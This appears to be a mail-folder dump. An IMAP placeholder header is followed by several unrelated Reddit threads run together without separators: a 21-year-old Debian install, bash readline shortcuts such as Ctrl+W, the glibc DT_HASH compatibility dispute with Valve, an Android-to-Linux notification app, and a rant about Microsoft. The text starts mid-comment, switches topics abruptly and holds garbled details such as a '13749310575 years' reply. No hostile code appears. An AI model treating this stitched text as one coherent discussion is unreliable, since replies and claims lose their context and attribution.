    X-IMAP: 0987466703 0000000000
    Status: RO

    This text is part of the internal format of your mail folder, and is not
    a real message.  It is created automatically by the mail system software.
    If deleted, important folder data will be lost, and it will be re-created
    with the data reset to initial values.


But to be fair, that machine was called scuzzie.  It was replaced by bohr on different hardware, with scuzzie running alongside.  Then dirac.  Then everything else was decommissioned, and everything since then has been dirac, just dist-upgraded.  And lifted and shifted via a few rsyncs (such that ctime of most files is sometime in 2013), and lots of LVM extends.  And then P2V'd, such that my primary desktop now is a VM, talking physically to the host's GPU.  The disk is off physically on a ZFS volume being presented from another physical server elsewhere.
24y of using linux, getting red hat from a CD during 1998, linux improve alot and my current laptop are using arch linux used from 2010 till now
Nice. I don't think I have any Debian system older than 11 years. Usually 3-4 releases. Then hardware is just too old, and I prefer to reinstall and setup everything from scratch stuff. I think I do have some machines from 2005 or so, which I might try to connect and so them apt get face lift. :)

My main desktop now is live booted from pendrive with everything stored in ram (tmpfs), so I reboot often and it is always fresh. Highest uptime was 60 days, because new kernels, and because upgrades start using tmpfs.
13749310575 years?? That's crazy
Nice bro, this is an incredibly story !
Impressive!  I've been dist-upgrading for around 9 or 10 years.  I thought that was something until now!
Wow
how do you handle the boot sector filling up with old kernel versions??
Well, gotta say, this is some of the more impressive things I’ve read in a while. Congrats on your Debian install and may it aurvive adulthood like a champ!
My arch is turing 5 in August. I've been using arch since 2012 but my laptop died so i had to switch to another one.
This is incredible. I dream to do this one day (my record is about 5 years) but if I buy a new computer I end up reinstalling. Just seems like a better idea in the event that you change architectures and filesystems. The fact of the matter is that you shouldn't have to reinstall every three months. It's a waste of time.
I find it funny how the "birth" date is wildly inaccurate having not been retrospectively set to the same as the modify date when the stat call was updated.

All those people telling me that modify date is not good enough to show when a file was created. Well, there you go.
How did you upgrade to 64-bit from a 32-bit install?
I am turning 21 in 22th April, your installation is 4 days older than me, damn.
I can hardly go two weeks without a fresh install.
[deleted]
Thanks trigger.
increidble!! i remmeber the times ive had to save installs after upgrading after months of leaving them
It still can't run for senator or president though.
Awesome!!

I've been playing around with Debian 3.0 on an old industrial SBC that was made in around 2000 or so _(I plan to talk about it on r/retrobattlestations and/or r/vintagecomputing when I'm able to make a better wiring harness for it)_.

Besides that, I have what started out as a KDE Neon installation back in 2017, but got sick and tired of Ubuntu's handholding (which it inherited) that treated me like a beginner, so I installed Debian 'testing' some time in between the releases of versions 9 and 10, making sure that the 'desktop-base' package didn't get installed so I'd get stock Plasma without Debian branding. After that, I took the hard drive out of my dying Inspiron and put it into an older ThinkPad I got, and cloned the drive over from the 250 GB flash storage over to 500 GB. Some time during that, I mixed in GNOME alongside Plasma. That installation is still with me today, but it had been kinda messed up and I've been trying to migrate my files from my laptop over to my workstation, so I've mostly been using the Windows partition since that works, and I may eventually reinstall the Debian side, or install openSUSE Tumbleweed instead.
I use MX Linux, a distro based on Debian Stable, and I'm proud to say MX Linux was when I finally stopped intermittently distro-hopping. It seems with every other distro, you're taking some kind of risk by running it, and I just got really damn tired of that.
Congratulations!!

did you mentioned you debian installation on previous years? i remember reading a comment very similar to yours a long while ago, about how hard it was to swith architectures :o
> the hardest upgrade I ever had to do

> an unbelievably maintainable system!

Perhaps maintainable means something else in my head vs yours :D

Nevertheless, congrats!
[Your Debian install is older than The Scorpion King.](https://www.reddit.com/r/movies/comments/u77pzq/20_years_ago_scorpion_king_turned_the_rock_into_a/)
Wow, that's amazing, very happy for you!
Wow that's quite impressive.  My oldest distro is 14.  Installation date 2008 if I go by some of the  folders like lost+found etc though the month/day seem to differ between folders so not sure how accurate that is to go by. OS is Fedora Core 9.  It was once my general purpose server back when I lived with my parents.  Did web, email, file, development etc.  When I moved to my house I eventually moved the hardware to a rackmount case and also expanded to a virtualized environment where lot of services eventually got migrated off except for mail.  It's a core2quad server.  I may have upgraded the actual hardware at some point too but I honestly don't remember.  

At some point a few years ago I virtualized it.  At this point the only thing it runs is mail.  It has fetchmail scripts that just grab mail from my online mailboxes and it runs imap. 

I really should retire it at some point, but it just works lol.
Wow. Just wow. I ran Potato in the 90's as well, and dist-upgraded I think twice before I got a new box and did a clean install. But good god 21 YEARS!
Excelente, felicidades!!!

Yo uso debían desde sarge. (Luego vuelvo para escribirlo en Ingles, words don't came easy to me...)
That's fucking awesome. I hope you have a 21yo beard to go with that.
My current Debian install would be 10 years old if it got to July, and it was a copy-over from an earlier disk, so it's been a dist-upgrade from at least etch.  In that time I've been accustomed to running Debian testing which at times has been risky but also has given me insight on the health of the distro.  However, I need to move the main disk to an SSD because the current HDD is a horrible speed bottleneck and I've been running MX-fluxbox on my file server for a few  years now with great success and it's time to both de-cruft and distro-hop to something more comfortable.
Oh your debian install is older than me by 4 months.
Geez, and In thought my one Fedora 12 32-bit install that I’ve marched all they way to Fedora 35 64-bit was old at 12 years.

Congrats on the successful chain of upgrades!
Give it a beer!
I am a bit new i guess. xD   
\[root@fedora \~\]# stat -c %w /  
2022-04-13 17:09:50.325001522 +0200
And here I was happy that my main install on my laptop is five years old, spanning ten fedora releases, across four-or-so laptops, plus additional storage upgrades, filesystem migrations, and a UEFI conversion.
knowing there's people with OS's older than me is mind blowing
2001.... Back when I had hopes and dreams of being happy with my life.
Damn and here I thought I was doing good with my 4 year old install of Debian Sid. Congrats I hope some day this install can celebrate at least a tenth birthday.
impressive work mate!
This is fascinating. I remember asking a question about this on r/linuxquestions, and I don't think a lot of people understood the question. So, I got multiple stories not related to the subject (I did get some solid answers). 21 years is crazy. I think that a person has to be in the mindset of "all distros are the same" to stay on a distro this long. I'm starting to get there myself, as I haven't distro-hopped for over 6 months now, and I still don't feel the need for it. 
Thank you for sharing.
my ubuntu install lived from 2012 to 2020, nowhere near that long. Migrated from a HDD to SATA SSD and then M.2 SSD and jumped two laptops. My Arch install is almost two years old now, quite young.
Very impressive.
[http://unix.stackexchange.com/questions/94331/how-can-i-delete-a-word-backward-at-the-command-line-bash-and-zsh](http://unix.stackexchange.com/questions/94331/how-can-i-delete-a-word-backward-at-the-command-line-bash-and-zsh)
[deleted]
This is also why you'll see people on the internet "correct" themselves with \^W, like the nerdy\^Wcool people they are.
This is part of what readline does, enjoy :) https://en.wikipedia.org/wiki/GNU_Readline
Well, unless you **set -o vi** to change to vi style keybinds. By default bash uses emacs style keybinds. 
Yay emacs key bindings. 
You can also use vi-like command line editing with bash's vi-mode:

    set -o vi

http://www.catonmat.net/blog/bash-vi-editing-mode-cheat-sheet/
Yep. But in my web browser is closes the tab. Bit of a pain in the arse.
Don't forget about ctrl+r; Searches through history for strings. It's much better than hitting the up arrow forever until you find the right one.
Yup.  After so many years of using control-w to go back a word, I had to unlearn some of that muscle memory when typing into a web browser.  Because control-w in a web browser deletes significantly more than a word.
`ctrl`-`w` is all fine and good but I find `alt`-`backspace` to be more natural.  Does the same thing.

A long time ago I made a quick reference sheet for most of these awesome bash/readline keyboard shortcuts here:

https://riskable.com/files/bash_shortcuts.pdf

Enjoy!

BTW:  Keyboard shortcuts are kind of a "thing" for me.  So much so that I (*very* recently) created a JavaScript library to make it possible to add keyboard shortcuts like this to any web app.  It even lets users assign their *own* keyboard shortcuts to whatever they like (if you set it up to do that).  Some of the folks on /r/linux might appreciate it:

https://github.com/liftoff/HumanInput
`ctrl r` is one of my favorites; lets you search your terminal history for commands. Useful if you use a few long ones frequently.
Why doesn't it use Ctrl + Backspace?  That's more standard and works basically everywhere.
You can get Readline's behaviour with all (suitable) command line programs by using [rlwrap](http://linux.die.net/man/1/rlwrap).
Ctrl+r will change your world. It does a reverse search through your shell history.
That's actualy pretty cool . Thanks
I always used ESC+ backspace. This is a lot less awkward
[deleted]
Mandatory reference to O'Reilly's [Unix Power Tools](http://shop.oreilly.com/product/9780596003302.do)
Fun fact, it's the Emacs keybindings. But I still use vim.....
Sucks when you're writing a long comment and try to do it in your web browser though.
These are just emacs binding...

ctrl-a = going to the beginning of a line

ctrl-e = go to the end of the line

ctrl-k = yank everything past the end of the cursor

ctrl-y = copy back at the cursor location what's in the yank buffer

ctrl-shift-_ = undo

loads more...

    set -o vi
There are a lot of shortcuts that most people don't know, if you use emacs most of the shortcuts you use there can be used in bash. And if you use vi there's a way to change the shortcut mode to vi, someone already said how.
Ctrl+h for last character too. Learned that from NetScreen SSG command line and it ended up working in Linux for me too lol
When using a browser-based terminal emulator, like Lish or GLish, ctrl+w conveniently closes the window.
but then how will we have the last word? 
Good info in this thread. Is there some reddit-RES way to save it?
`set -o vi`/`bindkey -v` :)
For longer things like piping grep and stuff you can create little functions to put into your /.bash_profile. I have a FF  <part of file name> for find, GG <contents> for grep, and another for creating and opening files with one command. 
Yeah, once i learn it I got so much into it that I use it everywhere... And unfortunately it's the shortcut for closing
I learned this by accident yesterday! 
wordstar will live forever.
/r/ProgrammerTIL 
Don't do that in Windows command prompt, it'll close the window xD
And you can open a new adjacent tab with cntr+T and new tab window with cntr+N
Check out the readline man pages
There are actually a lot more emacs-esque keybindings, its worth the time to spend an afternoon reading the emacs the tutorial.
It is much like emacs's key bindings, most of it movement keys are the same in bash
So many tabs have unnecessarily died because of this... 
You can delete the last word by pressing `alt` `+` `←` (works in every text input field)
I'm used to ctrl + backspace (like ctr + w) ctrl + delete, ctrl left and right, etc. I don't know where this comes from but it annoys me that it dosen't work in the terminal. I'm sure there are reasons and I'm already getting used to ctrl w ar least.

Using ncurses to make my own console for some application I was able to get it working as holding ctrl and pressing left or right makes a weird symbol so instead of allowing that I made it move the cursor to the next character class. This will probably annoy longtime linux terminal users though.
If you didn't know that, learn a bit about readline. You won't regret it. 
Alt+B brings you back a word also
THANK YOU
Shell or command line, not terminal. 
`Ctrl+backspace` in Windows to do the same thing.

`Ctrl+shift+t` to reopen browser tabs that you accidentally closed with `ctrl+w`
in tcsh it clears the whole line
TIL there's a dedicated button on all keyboards which do exactly this. 
I prefer Alt+Backspace, a bit easier to remember.
    set -o vi
type:

man readline
You can do the same in your web browser! *scnr*
alt+backspace too
Readline is the one instance where I must admit that Emacs keybindings are more convenient than vim keybindings.
Also:

* Shift-PgUp to scroll up, Shift-PgDn to scroll down
* Ctrl-Insert to copy, Shift-Insert to paste
* "reisnub" while holding Alt-SysReq to reboot
No, that's something Bash and other terminals do in response to receiving the End of Transmission Block character. Most certainly not something the Terminal does.

The Terminal end ETB to the stdin of its connected processes on ctrl+w, ETB instructs most shells to delete a word.

Other things than shells interpret ETB completely differently.

The shell doesn't understand `ctrl+w`, like any other terminal application, interactive or not, it just has a stdin, stderr and stdout, the Terminal is responsible for translating those keys to control characters and in reverse, what the shell outputs is also a stream of character wit various control characters the shell can send instructing the terminal to delete the last printed character andsoforth, that's the only way really that 'interactive' output is simulated, the terminal just deletes a line and redraws it basically.
> that in terminal

"in terminal' <cringe>       
bash?  ksh? csh? tcsh?
Anyone know the equivalent of this for Mac terminal? 
set -o vi

On Twitter Pierre-Loup Griffais @Plagman2 said:
>Unfortunate that upstream glibc discussion on DT_HASH isn't coming out strongly in favor of prioritizing compatibility with pre-existing applications. Every such instance contributes to damaging the idea of desktop Linux as a viable target for third-party developers.

https://twitter.com/Plagman2/status/1559683905904463873?t=Jsdlu1RLwzOaLBUP5r64-w&s=19
I'm a little unfamiliar with glibc stuff. Anyone have a TLDR on it?
>We understand that working with a focus on compatibility requires more resources and more engineering trade-offs, but strongly believe it is nonetheless the way to go. We are very interested in helping with any underlying resource constraints.

Valve is literally offering developers for free to help fix compatibility issues if upstream doesn't have enough resources. What a shame
yep, if its expected that vital system packages are just going to just ... break stuff, that doesn't inspire much confidence for either users or developers.
He isn't wrong
There are too many people in here peddling the false dichotomy of a stable ABI vs a stable API, or that binary compatibility only matters to proprietary software because we can simply rebuild the entire operating system on a whim when a fundamental piece of the system changes and breaks compatibility on a whim. You're wrong, and you're harming Linux as a platform.

You might as well tell me that it's perfectly ok that the foundation of my house is unstable, because having the blueprint means that I can just rebuild it. Anybody with a brain can see that's a shitty proposition.
Cross-posting my reply to the /r/linux_gaming version of this:

Required disclosure: I work for Microsoft

Additional disclosure: I also worked on SteamOS (BIOS support in the 1.0/2.0 installer), have been an Ubuntu dev and Debian dev since 2009, and have spoken at FOSDEM more than once

What Pierre-Loup is highlighting here is an egregious example of two common problems with the Linux software stack. On the one hand, developers look back on their older work, declare "Fuck, what idiot wrote this?" and write something new to fix their prior crimes, to be more correct, and view backwards compatibility as an inconvenience (after all, app devs can just recompile for ABI breaks and rewrite for API breaks, every few months for every lib). And on the other hand, nobody has the staffing (i.e. money) to either maintain multiple versions of libraries within a distro, or to keep bad or broken API forever in the name of compatibility.

It's a grind for app developers, who need to keep releasing and releasing and releasing if they want their app to keep building against new versions of libraries whose APIs are unstable (see also: iOS developers). And releasing multiple simultaneous binary versions if they want to ship binaries. Heck, forget all the wrongheaded talk of dynamic vs static linking - what ends up being the only sane solution is a \`dlopen()\` based shim to handle every ABI version of the libs you consume, at a cost of startup performance - moving the burden of maintaining things to the app developer rather than the lib developer.

Musl won't save you, it just brings you new problems (and breaks support with 100% of your existing apps, avoidance of which is the whole point of this discussion). Static linking won't help you (especially for parts like GPU drivers, which do not like this at all). What you need, as an ISV, is to be able to rely on your core libraries enough to ship something. But apparently that's asking too much.
Agreed.

~~Someone who was stuck trying to figure out why software was throwing an error about `__finite` math functions, only to discover that glibc removed them and there's no apparent explanation of why.
Yup, I agree.

I am stuck at using RHEL7 at work. I can't run any glibc-linked modern Rust binaries. I don't like musl project, but damn - from user POV at least it works and I can normally run the programs I need.
Welcome to Linux, where game binaries you released 15 years ago mysteriously no longer have sound, and that's if they can still run at all. Better off running them under Wine, no joke.

Our older themes and desktop extensions can't even work anymore unless someone constantly updates them. Seriously, people even break themes...

That said, Valve must make Linux gaming work because Microsoft is going to Netscape them sooner or later.
Time to [fork glibc](https://blog.aurel32.net/debian-is-switching-to-eglibc.html) again.
Valve not prioritizing a 64-bit Steam client is damaging the Linux desktop.
Couldn't Valve fork glibc and distribute it with the necessary compatibility? This probably is a stupid question, but I'm genuinely curious.
And people wonder why it isn't yet "The year of The Linux Desktop" when you have groups like the GLIBC devs throwing up a middle finger at Valve and telling them, "Get with the program or STFU."  


Valve has done nothing but good things trying to make Linux a viable every day driver for people who want to play games in their spare time without having to dual boot Windows. Then the GLIBC people do **this** BS.
[Linus Torvalds said this in 2014.](https://www.youtube.com/watch?v=Pzl1B7nB9Kc)
glibc breaking compatibility? valve trying to fix the mess that is linux desktop? Linus called it 7 years ago: https://youtu.be/Pzl1B7nB9Kc
This is why the most stable ABI on Linux in 2022 is Wine. Seriously.

We need to fix this.
Remember Sun's Solaris? You could run 20 year old binaries, generally without issue. I had a client once doing just that with an ancient DB, because their app depended on it.
How the heck did the glibc devs get away with literally violating [section 3.2](https://www.gnu.org/prep/standards/standards.html#Compatibility) of the GNU Coding Standards?

> With occasional exceptions, utility programs and libraries for GNU should be upward compatible with those in Berkeley Unix, and upward compatible with Standard C if Standard C specifies their behavior, and **upward compatible with POSIX if POSIX specifies their behavior.**

> When these standards conflict, it is useful to **offer compatibility modes for each of them.**

Is glibc officially no longer part of the GNU Project now?
Might also be unfair, but glibc is largely the only reason why nixpkgs can't be used in every distro in any workflow. Forward compatibility of glibc becomes an issue when using packages "from the future".

If linux no longer needed a "libc", it would solve a lot of portability issues. In practice, this would just shove the complexity somewhere else, but one can hope. (e.g. statically compiled binaries with LTO).
Sadly shit like this forces valve to re-evaluate their position on linux gaming.

Imagine improving a platform for years together with the community in order to make it viable for this usecase, only to be f***** by a removal of a single legacy feature and no proper way to reverse the change as it's not in your hands.
He has a point.

There are reasons why we still have to wait for the Linux Desktop of the Year. Not
all are originating from the Linux ecosystem, but some are.
It's almost as if this is the entire reason fixed releases are a thing

Edit: just found out the release was the beginning of August, no shit it fucking broke lmao
Why did this not go through a period of requiring an opt out so issues like this could be found and mitigated.
Imma be real with you - both sides are at fault:

* glibc devs, because they should inform about pulling DT\_HASH support week or two earlier. Yes, even if it's replacement was implemented 16 years ago. And there should be at least some effort to preserve compatibility, because EOL programs won't work at all.
* Epic, because during EAC development they haven't researched most popular solutions while implementing it. I would understand if devs started to work on it in 2005... Well they did, but first release was in 2013, so well after DT\_GNU\_HASH became popular and widely used. And Linux version was released in 2021, so they would definitely see it coming.
He's absolutely correct too.
Why can't Valve just use --hash-style=both?

It's just a linker option, not like they need to rewrite a bunch of code. Or am I missing something?
2.36 broke a lot of things and it's unfortunate
What about this: if it's proprietary/closed source, bundle the dependencies. If it's not, it's (usually) easy to adapt to the changes and recompile.

I personally don't care too much about closed source  stuff on (Gnu/)Linux. Even though I like gaming, I wouldn't take Steam and all that stuff too much into account. Look at Android. That's a Linux based OS that favors proprietary software over free software. If desktop Linux ends up somewhere remotely similar to this, I'm out. But that's just my two cents.

Also: Valve, you owe us Half-Life 3. Give it to us and we'll give back your hash function. And better make it good..
Glibc, maintained by GNU, the c lib that often gets criticized for maintaining too much compatibility ("bloat" according to the genius Linux experts on Reddit) is not prioritizing compatability?


How about people just use the hash function they're supposed to rather than relying on obviously deprecated functions
Counter argument: proprietary anti cheat devs had 16 years to work with. If you can’t fix your shit in 16 years, that’s on you.
There's a lot of blaming the provider of libre software in the comments, and very little blaming the provider of proprietary software... and it's intrusive DRM proprietary software, at that. I guess the whims of closed-source software must be catered to?
100% True. No possibility to compile a glibc app statically  and zero support for previous versions make every new distro a very poor C++ developers choice. Most of the time you would reach out to the oldest LTS to make your app run on the highest amount of distros possible.
Of course there are numerous other problems within the depedency hell domain, but Glibc really could be not one of them.
boo hoo, game devs will want 32-bit libs supported until the end of time too, all in the name of copy-protection
DT_HASH was phased out in 2006. Two thousand and motherfucking six!

Does Valve still supports Visual Studio 2005? Is Valve still checking for compatibility with Windows Vista? Is Valve still using MSVC 98 to compile their shit?

This is completely unacceptable. Linux is being held to a different standard than windows. What do they expect? Linux never changing anything because some useless anticheat (seriously, eac is shit) haven't received the memo that you don't use shit from ***16 years ago***?
So, Valve has problems adapting to a change in how glibc works which was made sixteen years ago.

And they proceed to blame glibc for this problem.

How do they get away with doing that? They made their bed, by not following a sixteen year old standard of how to use glibc, but instead choosing - CHOOSING - to use a deprecated method which has been on they way out for fifteen years. And somehow try to make this glibc's fault.

Seriously. If it's expected that developers should just be able to keep using methods which have been deprecated for over a decade, nothing will ever be possible to improve.
The GNU C  library doesn't exist to make things easier for developers of closed source proprietary software.  Quite the opposite, in fact.
Wow, dependency issues on Linux? I’m baffled. It’s almost as if letting software bundle their own dependencies is a good idea.
The amount of misinformation in this thread is appalling, GLIBC is absolutely not at fault in this scenario
They shouldn't prioritize backwards compatibility. That leads to a stagnant ecosystem.

Edit: This is hilarious. Tell me you haven't been around Linux for very long without...
Can this EAC stuff parse both DT\_HASH and DT\_GNU\_HASH? Wouldn't that solve the problem?
In the time it's taken to this point, Valve could have just released an update.
Run your unsupported software into a container where you have full control over your environment.
  
This is the problem with linux gaming adopting Windows binaries. It will inevitably try to establish its own defaults through numbers with no regards for the regular users.
  
So the software is closed source, no support, no update... and you want glibc to tune on these principles?
  
It's really awkward to see a steam employee turning against the glibc team and defending a model for the linux desktop where closed source and zero update forever is the new normal. The job of Valve employees is to sell Windows games, that's it. Linux is just a tool to do it, and *in fine* Valve is just another Microsoft products reseller.
Linux has been its own worst enemy since forever. only recently have there been any attempts to get it to a user friendly state, and compatibility has been a complete train wreck for the most part
glibc is probably the highest-profile one, but it's really almost everything on Linux.    It's not even just compatibility.  It's developers spending time adding their own pet features rather than fixing longstanding bugs because they personally don't consider those bugs a priority, redesigning interfaces to suit their own aesthetic whims, and so on.  Too many Linux developers persist in the mindset that because it is open source it is a "hobbyist" thing and it is "wrong" for users to expect any particular behavior, and it is basically okay for developers to do whatever they feel like and no one should complain because the product is free.  Linux will not succeed as a mainstream OS for use by the general public until the normal, default, accepted mindset involves developers considering themselves accountable to what users want.
glibc devs should drop old legacy APIs. And it is software's problem that it uses outdated API.

Also some breackage of proprietary malware called EAC should not considered important at all for GNU. But no, now we forced GNU libc devs to continue maintaining old legacy code because of this. Proprietary software just poisons Linux.
The idea of desktop Linux is a pipe dream, I just took a look at the new release of Mint and was just horrified by the UX design, or I should say lack thereof. If you want Desktop linux, you would be better off pleading with Tim Cook to port their macOS GUI to the Linux kernel. Honestly, I'm now of the impression that the needs of the Desktop and the needs of the Server are mutually exclusive.
I just released my first app that I've been working on for a while.

It can send your notifications on your phone to your linux desktop using tcp or bluetooth.

Encrypted with TLS. More info on github and Play Store.

Please let me know what you think!

&nbsp;

Play Store: https://play.google.com/store/apps/details?id=kiwi.root.an2linuxclient

Source code: https://github.com/rootkiwi/an2linuxclient

Source code server: https://github.com/rootkiwi/an2linuxserver
Was reading a comment from a user over on r/Ubuntu earlier who said this was one of the main reasons he stays with iOS. He loves how all of the information syncs across all of his devices.

The argument was that the software ecosystem just isn't there in Linux, and thats what was keeping him from using it fulltime.

Thank you for another awesome tool to add to the Linux ecosystem.
Please provide APK file since many people here (including me) do not run Google Play Services on their Android phones.
I haven't tried this yet but whoaaa this seems cool, like an android/linux equivalent to OSX and iOS.
Can it send notifications from your desktop to your phone?
might  want to consider using a catchier name
Hi, just a little advice from a computer security student:

I can see you use SHA-1 in many places to compute some fingerprints. Since SHA-1 is no longer considered secure against collisions, I'd strongly suggest using at least SHA-256 instead.

I guess you used SHA-1, because it has 16-byte output (32 bytes would be too long for a fingerprint). However, when you need a shorter hash, you shouldn't switch to a weaker algorithm. Instead, it is more secure to just truncate the result of SHA-256 to 16 bytes.
so...[KDEConnect](https://community.kde.org/KDEConnect)?
I don't have much time. Looks cool, but:

* You made an extra `.config` in my config directory (may have something to do with the fact that I have `$XDG_CONFIG_HOME` set) 
* ~~Upon issuing the "display test notification", I get the following error desktop side: `g-dbus-error-quark: GDBus.Error:org.freedesktop.DBus.Error.ServiceUnknown: The name org.freedesktop.Notifications was not provided by any .service files (2)`~~

Arch, in a terminal and I have your deps. (no Bluetooth) So maybe a hidden one?

~~is this different from what KDE connect does?~~

just checked the Google play link. never mind!
Could you submit this to fdroid. they need a new one all the ones on there are dead
If this is basically a Pushbullet desktop version, I'm sold. :)
Is this similar to LinConnect?
I was looking for a secure solution to this problem and you've implemented it pretty much *exactly* the way I'd hoped for! My use case is actually wanting to create an OpenVR overlay to receive these notifications so I can read and manage my phone notifications in virtual reality. Few questions:

* Do you have a design doc documenting the client/server protocol, at least for the TCP/IP version? I haven't dug into the source yet but something like this would help, especially if there's not something like a REST API running on the server component
* Wouldn't it make more sense to consider the phone to be the server and the desktop(s) to be the client(s)? It would be great in theory (and I'm not sure if you're already doing this) if a client could tell the phone to dismiss a notification or carry out one of its quick actions, and then have the acknowledgment sent to *all* the connected clients

Thanks for this!
Nah thx mate, I stick with KDE Connect.. but still awesome that there is now an app for it that isn't technicly desktop limited :).
[deleted]
I really needed this. Thank you!
Thanks, this looks interesting!

Would you mind getting up on F-droid? It is nice to have all good things accessible from one app ;)
Oh wow, can I send SMS with it too?
Have you posted this app on F-droid? It will be good if you do it.
I'm intrigued with this, but I'm out and about right now, so I can't dig into this. I didn't see this answered directly, so I'm just going to check... can you sync this remotely over the Internet? I mean, if you have a direct connection to your computer (static IP, dynamic DNS, etc), can your phone sync with it when it's connected to the local network? 

I don't have Bluetooth on any of my computers, so that won't be an option for me.
I've set this up, and will let you know how it goes. Eventually it would be nice to be able to `sudo apt-get install an2linux` for the server.
Thanks!
Anyone have screenshots for what the notifications look like on the desktop?
After glancing at a small part of the source code, firstly: good job, it looks very clean!

One quick comment though: I see that you're blocking local only notifications from being sent. I don't think this is needed. From my understanding and experience, a notification is made local only when a connected device (e.g. smart watch) will post their own notification. So, it's used to make sure duplicate notifications won't be posted. In the context of your app, you probably want to sync these, since duplicate notifications isn't a concern.
Whoa, so cool!  I wanted to write this after submitting my thesis.  Glad you already did. :D

Also, saw a typo, in an2linuxclient/utils/ConnectionHelper.java:
 String connetedToSsid = info.getSSID();


How does this compare to Nuntius? Which is open source, liteweight, on play store and packaged in Debian/Ubuntu. I guess this is encrypted and has more transport protocols? But Bluetooth itself already has some built-in security.
Awesome! Thanks a lot!

Though, it seems to be missing a huge functionnality: IPv6 support. All my machine have public IPv6 addresses but I can't use their hostname in an2linux it seems.

Also: do you plan on writing and keeping a PKGBUILD uptodate for Archlinux?
+1 on writing the desktop part in python rather than in *shudder* java!
Dude! Yes!
i installed on my ubuntu mate 16.04 , paired with wifi on my nexus 5 , its outstanding , congrats mate , definately worth trying . Something i'm gonna use it everyday . Peace 
Do you need help to translate the app? I could help you (if you want) to translate it into spanish (castillian).
This is an awesome app !  
Keep us updated if you do other great apps like this one. I find it really usefull, thaks a lot !
Is the only difference between this and KDE Connect that you support Bluetooth and "mobile" (which I assume means web, probably through your [not the user's, otherwise how to sync IP?] server)? Or is the functionality different?
can anyone explain to me how to use the bluetooth setting. I continuiously get "Failed to connect! try again" when i try and connect to my laptop. my phone is paired with the laptop and everything. idk the problem please help.
Great work! Has worked flawlessly for me for a couple of hours! (arch linux) 

I'll let you know if I discover any bugs. 
This is awesome, totally installing this later
This looks awesome!  Can't wait to try it out, nice going!
Are tcp and bluetooth really separate things? Bluetooth is its own protocol? I was under the impression it was just a diffrent medium.
[deleted]
That's cool! So if Notifications can be sent to a Linux machine, could that be done with phone calls or text messages? 
Is it available on f-droid? :)
Would be great if you could upload a demo video for this. What advantage would I have using your app over Pushbullet?


I'm already using Pushbullet on Chrome so I can get notifications from my phone on whatever platform I'm using as long as I have Chrome opened and Pushbullet installed. 
/u/rootkiwi can you make an app that does that but for SMS/MMS messages? I want a personal MightyText-like server. 
Nice app, it does the job, it does need some tweaks and features though, for example:

When the device is connected and is able to send notifications, the terminal just reports this:

"[2017-01-03 17:49:34] (TCP) Waiting for connections on port 46352" , doesn't report that a device is connected wether the client is enabled disabled or closed.

May i suggest adding a time setting for how long is a notification displayed?

I don't know what you plan to do with this going forward, but i'd really like to be able to reply to SMS and answer calls with it, fully featured using the terminal.

It's probably too much to ask right now but just an idea ;)

Thanks for this.
Is there anything like this for Mac? 
[deleted]
Pushbullet does this too if you have the browser extendion installed. It sends HTML5 notifications to your desktop

Although not exactly the same as it goes through Pushbullet's services and not BT/LAN.
If you have the browser extensions installed, PushBullet pretty much does this.  I don't think its encrypted, but its a pretty awesome service that does more than just notifications.
[deleted]
Rant incoming!

This is a trend I've been observing since last few years, but especially became clear when the github episode happened. For a whole lot of people on this and related subs, Microsoft is so sacred that even an attempt to criticize them is going to bring the fury and wrath of the Gods of Redmond!

I really don't understand why all this toxicity, I've never seen this kind of blind worship towards any other human or organization since the days of the reich. Why is it so difficult to understand that they too are humans who could make mistakes:

1. It was a mistake to bundle IE and force Windows down the OEM's throats back in 90s.
2. It was a mistake what they did to Skype (turning an open and decentralized chatting system into a centralized surveillance tool).
3. It was a mistake to forcefully bundle adware and crapware right into the heart of windows-10.
4. It was a mistake to force w-10 upgrade down everyone's throats instead of simply supporting w-7/8.
5. It was a mistake to fudge with the Office XML standards to keep LibreOffice as incompatible as possible.
6. It was a mistake what they did to Nokia.
7. It was a mistake what they did to Wunderlist.
8. It is a mistake that they are still funding litigation against linux interests (SCO, Android Patents, etc.) to this day, while proclaiming that they support open source.

Even a child with some logic circuits can grasp that above were serious mistakes . After making so many mistakes and getting away without any consequence as if nothing has happened, its but natural that people in the community are going to ask questions when they acquire yet another company, what's the reason for getting so butt-hurt about it?
Microsoft didn't just make mistakes, they made plans.  Those plans went beyond acts with unintentional consequences.  An example, and one you missed, was that they intentionally sabotaged OS2 by making a custom application crash in their demos so that IBM looked bad.  This is and was serious because the industry was serious business then -- as it still is now.  Their deceptive and illegal actions set the stage for decades, which assured them a monopoly position.  We aren't just talking about making bad decisions, we are talking about making long term industry damaging decisions that for the lack of competition that it created it hurt everyone, every business.

Your post is naive because it doesn't go back and analyze the actual world as it was and it doesn't analyze what we are seeing today.  There literally is no development to speak of on the desktop.  We have really no new products.  If something new is created the monopoly power quashes it (more subtly than in the past, but they do quash it), or they adopt it in hopes of owning that part of the market too.  Look at product announcements and watch that Microsoft jumps in in most every case.  Yeah they fail once in a while, as they have with cell phones.  Right now IoT can become a big thing if not for the security consequences that are becoming obvious, but Microsoft would jump in with their horrendous OS and add to that instead of putting in serious effort, effort to actually make a better more secure series of IoT products.

Microsoft is living the embrace, extend, extinguish in every fiber of their being because that is who and what they are.  They may have the young naive employee feel defensive and fight back by arguing otherwise yet it does not change the facts, nor the fact that a tiger doesn't change its stripes.  Microsoft is just much better at hiding its tactics from the public.  The consequences are the same -- no innovation, no competition, poorer designed and less secure products and markets, and true innovators driven in directions that are wrong or constrained.

Our woes in the market are directly and almost solely attributable to Microsoft.  With billions in profit every quarter we still see little innovation, we see that changes coming to the products such as Windows are about collecting data and exploiting that for greater profit, that and our privacy and security be a secondary concern and only be a larger concern if it makes more profit.  Just read some of the descriptions of the privacy options in Windows 10, look at how they drive consumers to not choose the proper privacy -- the choice should always be to disclose nothing to anyone as you are not their product.  If you have difficulty understanding the wording then realize that the average person understands none of it and being that software is complex, and sometimes making the wrong choice can cause you grief, people chose not to change things.  Defaults are important.

This complexity is killing the industry.  People would rather not buy or use a computer because it is so unstable and insecure and gives away their privacy.  These are real concerns and it causes people to avoid technology and if you don't see this you are living in a strange dimension.  People are no where near educated to the point where they can understand the choices and consequences.  The complexity and instability of Windows causes no end of grief and Microsoft does little to correct this, partly because people invest time and struggle to learn this stuff so much so that they predict learning something new will be just as difficult and troubling with no guarantee of payoff. In other words they'll have spent even more time learning something new and still have all the same types of difficulty. Microsoft preys on this to keep their monopoly and have intentionally made things difficult in their underlying technologies to keep people and businesses from moving onto another platform.  We all see this and know it, and we often justify it for them because it means job security, and we do this all the while bitching and moaning at the common man for their lack of motivation to learn.

